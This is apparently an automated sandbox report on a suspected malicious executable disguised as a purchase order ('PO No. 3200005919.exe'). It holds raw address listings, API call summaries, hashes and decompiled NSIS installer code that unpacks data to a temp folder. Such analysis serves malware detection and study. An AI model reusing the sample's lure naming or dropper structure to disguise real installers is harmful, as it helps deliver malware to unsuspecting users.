                                                                      0x00403b73
                                                                      0x00403b73
                                                                      0x00403b76
                                                                      0x00403b78
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403b86
                                                                      0x00403b98
                                                                      0x00403b9d
                                                                      0x00403ba6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403bac
                                                                      0x00403bae
                                                                      0x00403bbb
                                                                      0x00403bbb
                                                                      0x00403bc4
                                                                      0x00403bca
                                                                      0x00403bf2
                                                                      0x00403bfa
                                                                      0x00000000
                                                                      0x00403bdc
                                                                      0x00403bdd
                                                                      0x00403be6
                                                                      0x00403bec
                                                                      0x00403bed
                                                                      0x00000000
                                                                      0x00403bed
                                                                      0x00403be8
                                                                      0x00403bea
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403bea
                                                                      0x00403bca

                                                                      APIs
                                                                        • Part of subcall function 0040678A: GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
                                                                        • Part of subcall function 0040678A: GetProcAddress.KERNEL32(00000000,?), ref: 004067B7
                                                                      • GetUserDefaultUILanguage.KERNELBASE(00000002,C:\Users\user\AppData\Local\Temp\,75703420,"C:\Users\user\Desktop\PO No. 3200005919.exe",00000000), ref: 00403AD8
                                                                        • Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304
                                                                      • lstrcatW.KERNEL32(1033,00423728), ref: 00403B3F
                                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\Overfurnished\Tuberculisation\Woodwose,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BBF
                                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\Overfurnished\Tuberculisation\Woodwose,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BD2
                                                                      • GetFileAttributesW.KERNEL32(Call), ref: 00403BDD
                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\Overfurnished\Tuberculisation\Woodwose), ref: 00403C26
                                                                      • RegisterClassW.USER32(004291E0), ref: 00403C63
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C7B
                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CB0
                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403CE6
                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D12
                                                                      • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D1F
                                                                      • RegisterClassW.USER32(004291E0), ref: 00403D28
                                                                      • DialogBoxParamW.USER32(?,00000000,00403E6C,00000000), ref: 00403D47
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: "C:\Users\user\Desktop\PO No. 3200005919.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Overfurnished\Tuberculisation\Woodwose$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                      • API String ID: 606308-3654939651
                                                                      • Opcode ID: ee5fd85ec343bc094daa65e3c13ef1cff60d12f5a08356af1ceed260609d9923
                                                                      • Instruction ID: afe91a4761cf59ebc4b7da6c1f2e4a45d87dcf75ce704844472433b73fc63153
                                                                      • Opcode Fuzzy Hash: ee5fd85ec343bc094daa65e3c13ef1cff60d12f5a08356af1ceed260609d9923
                                                                      • Instruction Fuzzy Hash: 81619370200601BED720AF669D46E2B3A7CEB84B49F40447FFD45B62E2DB7D9912862D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 439 402f14-402f62 GetTickCount GetModuleFileNameW call 405ea2 442 402f64-402f69 439->442 443 402f6e-402f9c call 4063b0 call 405ccd call 4063b0 GetFileSize 439->443 444 4031b3-4031b7 442->444 451 402fa2-402fb9 443->451 452 40308c-40309a call 402e72 443->452 454 402fbb 451->454 455 402fbd-402fca call 40342b 451->455 458 4030a0-4030a3 452->458 459 40316b-403170 452->459 454->455 463 402fd0-402fd6 455->463 464 403127-40312f call 402e72 455->464 461 4030a5-4030bd call 403441 call 40342b 458->461 462 4030cf-40311b GlobalAlloc call 4068eb call 405ed1 CreateFileW 458->462 459->444 461->459 491 4030c3-4030c9 461->491 488 403131-403161 call 403441 call 4031ba 462->488 489 40311d-403122 462->489 468 403056-40305a 463->468 469 402fd8-402ff0 call 405e5d 463->469 464->459 472 403063-403069 468->472 473 40305c-403062 call 402e72 468->473 469->472 484 402ff2-402ff9 469->484 480 40306b-403079 call 40687d 472->480 481 40307c-403086 472->481 473->472 480->481 481->451 481->452 484->472 490 402ffb-403002 484->490 499 403166-403169 488->499 489->444 490->472 492 403004-40300b 490->492 491->459 491->462 492->472 494 40300d-403014 492->494 494->472 496 403016-403036 494->496 496->459 498 40303c-403040 496->498 500 403042-403046 498->500 501 403048-403050 498->501 499->459 502 403172-403183 499->502 500->452 500->501 501->472 503 403052-403054 501->503 504 403185 502->504 505 40318b-403190 502->505 503->472 504->505 506 403191-403197 505->506 506->506 507 403199-4031b1 call 405e5d 506->507 507->444
                                                                      C-Code - Quality: 99%
                                                                      			E00402F14(void* __eflags, signed int _a4) {
                                                                      				long _v8;
                                                                      				long _v12;
                                                                      				intOrPtr _v16;
                                                                      				long _v20;
                                                                      				intOrPtr _v24;
                                                                      				intOrPtr _v28;
                                                                      				intOrPtr _v32;
                                                                      				intOrPtr _v36;
                                                                      				signed int _v40;
                                                                      				short _v560;
                                                                      				signed int _t54;
                                                                      				void* _t57;
                                                                      				void* _t62;
                                                                      				intOrPtr _t65;
                                                                      				void* _t68;
                                                                      				intOrPtr* _t70;
                                                                      				intOrPtr _t71;
                                                                      				signed int _t77;
                                                                      				signed int _t82;
                                                                      				signed int _t83;
                                                                      				signed int _t89;
                                                                      				intOrPtr _t92;
                                                                      				signed int _t101;
                                                                      				signed int _t103;
                                                                      				void* _t105;
                                                                      				signed int _t106;
                                                                      				signed int _t109;
                                                                      				void* _t110;
                                                                      
                                                                      				_v8 = 0;
                                                                      				_v12 = 0;
                                                                      				 *0x42a250 = GetTickCount() + 0x3e8;
                                                                      				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\PO No. 3200005919.exe", 0x400);
                                                                      				_t105 = E00405EA2(L"C:\\Users\\Arthur\\Desktop\\PO No. 3200005919.exe", 0x80000000, 3);
                                                                      				 *0x40a018 = _t105;
                                                                      				if(_t105 == 0xffffffff) {
                                                                      					return L"Error launching installer";
                                                                      				}
                                                                      				E004063B0(L"C:\\Users\\Arthur\\Desktop", L"C:\\Users\\Arthur\\Desktop\\PO No. 3200005919.exe");
                                                                      				E004063B0(0x439000, E00405CCD(L"C:\\Users\\Arthur\\Desktop"));
                                                                      				_t54 = GetFileSize(_t105, 0);
                                                                      				__eflags = _t54;
                                                                      				 *0x418ee0 = _t54;
                                                                      				_t109 = _t54;
                                                                      				if(_t54 <= 0) {
                                                                      					L22:
                                                                      					E00402E72(1);
                                                                      					__eflags =  *0x42a258;
                                                                      					if( *0x42a258 == 0) {
                                                                      						goto L30;
                                                                      					}
                                                                      					__eflags = _v12;
                                                                      					if(_v12 == 0) {
                                                                      						L26:
                                                                      						_t57 = GlobalAlloc(0x40, _v20); // executed
                                                                      						_t110 = _t57;
                                                                      						E004068EB(0x40ce48);
                                                                      						E00405ED1(0x40ce48,  &_v560, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\"); // executed
                                                                      						_t62 = CreateFileW( &_v560, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
                                                                      						__eflags = _t62 - 0xffffffff;
                                                                      						 *0x40a01c = _t62;
                                                                      						if(_t62 != 0xffffffff) {
                                                                      							_t65 = E00403441( *0x42a258 + 0x1c);
                                                                      							 *0x418ee4 = _t65;
                                                                      							 *0x418ed8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                                                      							_t68 = E004031BA(_v16, 0xffffffff, 0, _t110, _v20); // executed
                                                                      							__eflags = _t68 - _v20;
                                                                      							if(_t68 == _v20) {
                                                                      								__eflags = _v40 & 0x00000001;
                                                                      								 *0x42a254 = _t110;
                                                                      								 *0x42a25c =  *_t110;
                                                                      								if((_v40 & 0x00000001) != 0) {
                                                                      									 *0x42a260 =  *0x42a260 + 1;
                                                                      									__eflags =  *0x42a260;
                                                                      								}
                                                                      								_t45 = _t110 + 0x44; // 0x44
                                                                      								_t70 = _t45;
                                                                      								_t101 = 8;
                                                                      								do {
                                                                      									_t70 = _t70 - 8;
                                                                      									 *_t70 =  *_t70 + _t110;
                                                                      									_t101 = _t101 - 1;
                                                                      									__eflags = _t101;
                                                                      								} while (_t101 != 0);
                                                                      								_t71 =  *0x418ed4; // 0x7680
                                                                      								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
                                                                      								E00405E5D(0x42a280, _t110 + 4, 0x40);
                                                                      								__eflags = 0;
                                                                      								return 0;
                                                                      							}
                                                                      							goto L30;
                                                                      						}
                                                                      						return L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                      					}
                                                                      					E00403441( *0x418ed0);
                                                                      					_t77 = E0040342B( &_a4, 4);
                                                                      					__eflags = _t77;
                                                                      					if(_t77 == 0) {
                                                                      						goto L30;
                                                                      					}
                                                                      					__eflags = _v8 - _a4;
                                                                      					if(_v8 != _a4) {
                                                                      						goto L30;
                                                                      					}
                                                                      					goto L26;
                                                                      				} else {
                                                                      					do {
                                                                      						_t106 = _t109;
                                                                      						asm("sbb eax, eax");
                                                                      						_t82 = ( ~( *0x42a258) & 0x00007e00) + 0x200;
                                                                      						__eflags = _t109 - _t82;
                                                                      						if(_t109 >= _t82) {
                                                                      							_t106 = _t82;
                                                                      						}
                                                                      						_t83 = E0040342B(0x418ee8, _t106);
                                                                      						__eflags = _t83;
                                                                      						if(_t83 == 0) {
                                                                      							E00402E72(1);
                                                                      							L30:
                                                                      							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                      						}
                                                                      						__eflags =  *0x42a258;
                                                                      						if( *0x42a258 != 0) {
                                                                      							__eflags = _a4 & 0x00000002;
                                                                      							if((_a4 & 0x00000002) == 0) {
                                                                      								E00402E72(0);
                                                                      							}
                                                                      							goto L19;
                                                                      						}
                                                                      						E00405E5D( &_v40, 0x418ee8, 0x1c);
                                                                      						_t89 = _v40;
                                                                      						__eflags = _t89 & 0xfffffff0;
                                                                      						if((_t89 & 0xfffffff0) != 0) {
                                                                      							goto L19;
                                                                      						}
                                                                      						__eflags = _v36 - 0xdeadbeef;
                                                                      						if(_v36 != 0xdeadbeef) {
                                                                      							goto L19;
                                                                      						}
                                                                      						__eflags = _v24 - 0x74736e49;
                                                                      						if(_v24 != 0x74736e49) {
                                                                      							goto L19;
                                                                      						}
                                                                      						__eflags = _v28 - 0x74666f73;
                                                                      						if(_v28 != 0x74666f73) {
                                                                      							goto L19;
                                                                      						}
                                                                      						__eflags = _v32 - 0x6c6c754e;
                                                                      						if(_v32 != 0x6c6c754e) {
                                                                      							goto L19;
                                                                      						}
                                                                      						_a4 = _a4 | _t89;
                                                                      						_t103 =  *0x418ed0; // 0x13c17
                                                                      						 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
                                                                      						_t92 = _v16;
                                                                      						__eflags = _t92 - _t109;
                                                                      						 *0x42a258 = _t103;
                                                                      						if(_t92 > _t109) {
                                                                      							goto L30;
                                                                      						}
                                                                      						__eflags = _a4 & 0x00000008;
                                                                      						if((_a4 & 0x00000008) != 0) {
                                                                      							L15:
                                                                      							_v12 = _v12 + 1;
                                                                      							_t109 = _t92 - 4;
                                                                      							__eflags = _t106 - _t109;
                                                                      							if(_t106 > _t109) {
                                                                      								_t106 = _t109;
                                                                      							}
                                                                      							goto L19;
                                                                      						}
                                                                      						__eflags = _a4 & 0x00000004;
                                                                      						if((_a4 & 0x00000004) != 0) {
                                                                      							goto L22;
                                                                      						}
                                                                      						goto L15;
                                                                      						L19:
                                                                      						__eflags = _t109 -  *0x418ee0; // 0x153ac
                                                                      						if(__eflags < 0) {
                                                                      							_v8 = E0040687D(_v8, 0x418ee8, _t106);
                                                                      						}
                                                                      						 *0x418ed0 =  *0x418ed0 + _t106;
                                                                      						_t109 = _t109 - _t106;
                                                                      						__eflags = _t109;
                                                                      					} while (_t109 > 0);
                                                                      					goto L22;
                                                                      				}
                                                                      			}































                                                                      0x00402f22
                                                                      0x00402f25
                                                                      0x00402f3f
                                                                      0x00402f44
                                                                      0x00402f57
                                                                      0x00402f5c
                                                                      0x00402f62
                                                                      0x00000000
                                                                      0x00402f64
                                                                      0x00402f75
                                                                      0x00402f86
                                                                      0x00402f8d
                                                                      0x00402f93
                                                                      0x00402f95
                                                                      0x00402f9a
                                                                      0x00402f9c
                                                                      0x0040308c
                                                                      0x0040308e
                                                                      0x00403093
                                                                      0x0040309a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004030a0
                                                                      0x004030a3
                                                                      0x004030cf
                                                                      0x004030d4
                                                                      0x004030df
                                                                      0x004030e1
                                                                      0x004030f2
                                                                      0x0040310d
                                                                      0x00403113
                                                                      0x00403116
                                                                      0x0040311b
                                                                      0x0040313a
                                                                      0x0040314a
                                                                      0x0040315c
                                                                      0x00403161
                                                                      0x00403166
                                                                      0x00403169
                                                                      0x00403172
                                                                      0x00403176
                                                                      0x0040317e
                                                                      0x00403183
                                                                      0x00403185
                                                                      0x00403185
                                                                      0x00403185
                                                                      0x0040318d
                                                                      0x0040318d
                                                                      0x00403190
                                                                      0x00403191
                                                                      0x00403191
                                                                      0x00403194
                                                                      0x00403196
                                                                      0x00403196
                                                                      0x00403196
                                                                      0x00403199
                                                                      0x004031a0
                                                                      0x004031ac
                                                                      0x004031b1
                                                                      0x00000000
                                                                      0x004031b1
                                                                      0x00000000
                                                                      0x00403169
                                                                      0x00000000
                                                                      0x0040311d
                                                                      0x004030ab
                                                                      0x004030b6
                                                                      0x004030bb
                                                                      0x004030bd
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004030c6
                                                                      0x004030c9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402fa2
                                                                      0x00402fa2
                                                                      0x00402fa7
                                                                      0x00402fab
                                                                      0x00402fb2
                                                                      0x00402fb7
                                                                      0x00402fb9
                                                                      0x00402fbb
                                                                      0x00402fbb
                                                                      0x00402fc3
                                                                      0x00402fc8
                                                                      0x00402fca
                                                                      0x00403129
                                                                      0x0040316b
                                                                      0x00000000
                                                                      0x0040316b
                                                                      0x00402fd0
                                                                      0x00402fd6
                                                                      0x00403056
                                                                      0x0040305a
                                                                      0x0040305d
                                                                      0x00403062
                                                                      0x00000000
                                                                      0x0040305a
                                                                      0x00402fe3
                                                                      0x00402fe8
                                                                      0x00402feb
                                                                      0x00402ff0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402ff2
                                                                      0x00402ff9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402ffb
                                                                      0x00403002
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403004
                                                                      0x0040300b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040300d
                                                                      0x00403014
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403016
                                                                      0x0040301c
                                                                      0x00403025
                                                                      0x0040302b
                                                                      0x0040302e
                                                                      0x00403030
                                                                      0x00403036
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040303c
                                                                      0x00403040
                                                                      0x00403048
                                                                      0x00403048
                                                                      0x0040304b
                                                                      0x0040304e
                                                                      0x00403050
                                                                      0x00403052
                                                                      0x00403052
                                                                      0x00000000
                                                                      0x00403050
                                                                      0x00403042
                                                                      0x00403046
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403063
                                                                      0x00403063
                                                                      0x00403069
                                                                      0x00403079
                                                                      0x00403079
                                                                      0x0040307c
                                                                      0x00403082
                                                                      0x00403084
                                                                      0x00403084
                                                                      0x00000000
                                                                      0x00402fa2

                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00402F28
                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO No. 3200005919.exe,00000400), ref: 00402F44
                                                                        • Part of subcall function 00405EA2: GetFileAttributesW.KERNELBASE(00000003,00402F57,C:\Users\user\Desktop\PO No. 3200005919.exe,80000000,00000003), ref: 00405EA6
                                                                        • Part of subcall function 00405EA2: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405EC8
                                                                      • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO No. 3200005919.exe,C:\Users\user\Desktop\PO No. 3200005919.exe,80000000,00000003), ref: 00402F8D
                                                                      • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                      • String ID: "C:\Users\user\Desktop\PO No. 3200005919.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PO No. 3200005919.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                      • API String ID: 2803837635-2278025898
                                                                      • Opcode ID: 4aa3185e2732ea1d92bd2938039fdcb50ab67e449d873de13479ee0b69e06266
                                                                      • Instruction ID: 409c8f22eebac3ceeba7cf51205c68f93d68dba00e9ec32c8e3ebc1c19b8881b
                                                                      • Opcode Fuzzy Hash: 4aa3185e2732ea1d92bd2938039fdcb50ab67e449d873de13479ee0b69e06266
                                                                      • Instruction Fuzzy Hash: 8D61E031A00204ABDB20EF65DD85A9A7BA8EB04355F20817FF901F72D0C77C9A418BAD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 574 4063d2-4063dd 575 4063f0-406406 574->575 576 4063df-4063ee 574->576 577 40640c-406419 575->577 578 40661e-406624 575->578 576->575 577->578 579 40641f-406426 577->579 580 40662a-406635 578->580 581 40642b-406438 578->581 579->578 583 406640-406641 580->583 584 406637-40663b call 4063b0 580->584 581->580 582 40643e-40644a 581->582 585 406450-40648e 582->585 586 40660b 582->586 584->583 588 406494-40649f 585->588 589 4065ae-4065b2 585->589 590 406619-40661c 586->590 591 40660d-406617 586->591 592 4064a1-4064a6 588->592 593 4064b8 588->593 594 4065b4-4065ba 589->594 595 4065e5-4065e9 589->595 590->578 591->578 592->593 598 4064a8-4064ab 592->598 601 4064bf-4064c6 593->601 599 4065ca-4065d6 call 4063b0 594->599 600 4065bc-4065c8 call 4062f7 594->600 596 4065f8-406609 lstrlenW 595->596 597 4065eb-4065f3 call 4063d2 595->597 596->578 597->596 598->593 604 4064ad-4064b0 598->604 610 4065db-4065e1 599->610 600->610 606 4064c8-4064ca 601->606 607 4064cb-4064cd 601->607 604->593 611 4064b2-4064b6 604->611 606->607 608 406508-40650b 607->608 609 4064cf-4064ed call 40627e 607->609 615 40651b-40651e 608->615 616 40650d-406519 GetSystemDirectoryW 608->616 617 4064f2-4064f6 609->617 610->596 614 4065e3 610->614 611->601 618 4065a6-4065ac call 406644 614->618 620 406520-40652e GetWindowsDirectoryW 615->620 621 406589-40658b 615->621 619 40658d-406591 616->619 622 406596-406599 617->622 623 4064fc-406503 call 4063d2 617->623 618->596 619->618 625 406593 619->625 620->621 621->619 624 406530-40653a 621->624 622->618 628 40659b-4065a1 lstrcatW 622->628 623->619 630 406554-40656a SHGetSpecialFolderLocation 624->630 631 40653c-40653f 624->631 625->622 628->618 632 406585 630->632 633 40656c-406583 SHGetPathFromIDListW CoTaskMemFree 630->633 631->630 635 406541-406548 631->635 632->621 633->619 633->632 636 406550-406552 635->636 636->619 636->630
                                                                      C-Code - Quality: 72%
                                                                      			E004063D2(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                                      				signed int _v8;
                                                                      				struct _ITEMIDLIST* _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _t43;
                                                                      				WCHAR* _t44;
                                                                      				signed char _t46;
                                                                      				signed int _t47;
                                                                      				signed int _t48;
                                                                      				short _t58;
                                                                      				short _t60;
                                                                      				short _t62;
                                                                      				void* _t70;
                                                                      				signed int _t76;
                                                                      				void* _t82;
                                                                      				signed char _t83;
                                                                      				short _t86;
                                                                      				signed int _t96;
                                                                      				void* _t102;
                                                                      				short _t103;
                                                                      				signed int _t106;
                                                                      				signed int _t108;
                                                                      				void* _t109;
                                                                      				WCHAR* _t110;
                                                                      				void* _t112;
                                                                      
                                                                      				_t109 = __esi;
                                                                      				_t102 = __edi;
                                                                      				_t70 = __ebx;
                                                                      				_t43 = _a8;
                                                                      				if(_t43 < 0) {
                                                                      					_t43 =  *( *0x42921c - 4 + _t43 * 4);
                                                                      				}
                                                                      				_push(_t70);
                                                                      				_push(_t109);
                                                                      				_push(_t102);
                                                                      				_t96 =  *0x42a298 + _t43 * 2;
                                                                      				_t44 = 0x4281e0;
                                                                      				_t110 = 0x4281e0;
                                                                      				if(_a4 >= 0x4281e0 && _a4 - 0x4281e0 >> 1 < 0x800) {
                                                                      					_t110 = _a4;
                                                                      					_a4 = _a4 & 0x00000000;
                                                                      				}
                                                                      				while(1) {
                                                                      					_t103 =  *_t96;
                                                                      					if(_t103 == 0) {
                                                                      						break;
                                                                      					}
                                                                      					__eflags = (_t110 - _t44 & 0xfffffffe) - 0x800;
                                                                      					if((_t110 - _t44 & 0xfffffffe) >= 0x800) {
                                                                      						break;
                                                                      					}
                                                                      					_t82 = 2;
                                                                      					_t96 = _t96 + _t82;
                                                                      					__eflags = _t103 - 4;
                                                                      					_a8 = _t96;
                                                                      					if(__eflags >= 0) {
                                                                      						if(__eflags != 0) {
                                                                      							 *_t110 = _t103;
                                                                      							_t110 = _t110 + _t82;
                                                                      							__eflags = _t110;
                                                                      						} else {
                                                                      							 *_t110 =  *_t96;
                                                                      							_t110 = _t110 + _t82;
                                                                      							_t96 = _t96 + _t82;
                                                                      						}
                                                                      						continue;
                                                                      					}
                                                                      					_t83 =  *((intOrPtr*)(_t96 + 1));
                                                                      					_t46 =  *_t96;
                                                                      					_t47 = _t46 & 0x000000ff;
                                                                      					_v8 = (_t83 & 0x0000007f) << 0x00000007 | _t46 & 0x0000007f;
                                                                      					_a8 = _a8 + 2;
                                                                      					_v28 = _t47 | 0x00008000;
                                                                      					_v24 = _t47;
                                                                      					_t76 = _t83 & 0x000000ff;
                                                                      					_v16 = _t76;
                                                                      					__eflags = _t103 - 2;
                                                                      					_v20 = _t76 | 0x00008000;
                                                                      					if(_t103 != 2) {
                                                                      						__eflags = _t103 - 3;
                                                                      						if(_t103 != 3) {
                                                                      							__eflags = _t103 - 1;
                                                                      							if(_t103 == 1) {
                                                                      								__eflags = (_t47 | 0xffffffff) - _v8;
                                                                      								E004063D2(_t76, _t103, _t110, _t110, (_t47 | 0xffffffff) - _v8);
                                                                      							}
                                                                      							L43:
                                                                      							_t48 = lstrlenW(_t110);
                                                                      							_t96 = _a8;
                                                                      							_t110 =  &(_t110[_t48]);
                                                                      							_t44 = 0x4281e0;
                                                                      							continue;
                                                                      						}
                                                                      						_t106 = _v8;
                                                                      						__eflags = _t106 - 0x1d;
                                                                      						if(_t106 != 0x1d) {
                                                                      							__eflags = (_t106 << 0xb) + 0x42b000;
                                                                      							E004063B0(_t110, (_t106 << 0xb) + 0x42b000);
                                                                      						} else {
                                                                      							E004062F7(_t110,  *0x42a248);
                                                                      						}
                                                                      						__eflags = _t106 + 0xffffffeb - 7;
                                                                      						if(_t106 + 0xffffffeb < 7) {
                                                                      							L34:
                                                                      							E00406644(_t110);
                                                                      						}
                                                                      						goto L43;
                                                                      					}
                                                                      					_t86 =  *0x42a24c;
                                                                      					__eflags = _t86;
                                                                      					_t108 = 2;
                                                                      					if(_t86 >= 0) {
                                                                      						L13:
                                                                      						_v8 = 1;
                                                                      						L14:
                                                                      						__eflags =  *0x42a2e4;
                                                                      						if( *0x42a2e4 != 0) {
                                                                      							_t108 = 4;
                                                                      						}
                                                                      						__eflags = _t47;
                                                                      						if(__eflags >= 0) {
                                                                      							__eflags = _t47 - 0x25;
                                                                      							if(_t47 != 0x25) {
                                                                      								__eflags = _t47 - 0x24;
                                                                      								if(_t47 == 0x24) {
                                                                      									GetWindowsDirectoryW(_t110, 0x400);
                                                                      									_t108 = 0;
                                                                      								}
                                                                      								while(1) {
                                                                      									__eflags = _t108;
                                                                      									if(_t108 == 0) {
                                                                      										goto L30;
                                                                      									}
                                                                      									_t58 =  *0x42a244;
                                                                      									_t108 = _t108 - 1;
                                                                      									__eflags = _t58;
                                                                      									if(_t58 == 0) {
                                                                      										L26:
                                                                      										_t60 = SHGetSpecialFolderLocation( *0x42a248,  *(_t112 + _t108 * 4 - 0x18),  &_v12);
                                                                      										__eflags = _t60;
                                                                      										if(_t60 != 0) {
                                                                      											L28:
                                                                      											 *_t110 =  *_t110 & 0x00000000;
                                                                      											__eflags =  *_t110;
                                                                      											continue;
                                                                      										}
                                                                      										__imp__SHGetPathFromIDListW(_v12, _t110);
                                                                      										__imp__CoTaskMemFree(_v12);
                                                                      										__eflags = _t60;
                                                                      										if(_t60 != 0) {
                                                                      											goto L30;
                                                                      										}
                                                                      										goto L28;
                                                                      									}
                                                                      									__eflags = _v8;
                                                                      									if(_v8 == 0) {
                                                                      										goto L26;
                                                                      									}
                                                                      									_t62 =  *_t58( *0x42a248,  *(_t112 + _t108 * 4 - 0x18), 0, 0, _t110); // executed
                                                                      									__eflags = _t62;
                                                                      									if(_t62 == 0) {
                                                                      										goto L30;
                                                                      									}
                                                                      									goto L26;
                                                                      								}
                                                                      								goto L30;
                                                                      							}
                                                                      							GetSystemDirectoryW(_t110, 0x400);
                                                                      							goto L30;
                                                                      						} else {
                                                                      							E0040627E( *0x42a298, __eflags, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t47 & 0x0000003f) * 2, _t110, _t47 & 0x00000040); // executed
                                                                      							__eflags =  *_t110;
                                                                      							if( *_t110 != 0) {
                                                                      								L32:
                                                                      								__eflags = _t76 - 0x1a;
                                                                      								if(_t76 == 0x1a) {
                                                                      									lstrcatW(_t110, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                      								}
                                                                      								goto L34;
                                                                      							}
                                                                      							E004063D2(_t76, _t108, _t110, _t110, _t76);
                                                                      							L30:
                                                                      							__eflags =  *_t110;
                                                                      							if( *_t110 == 0) {
                                                                      								goto L34;
                                                                      							}
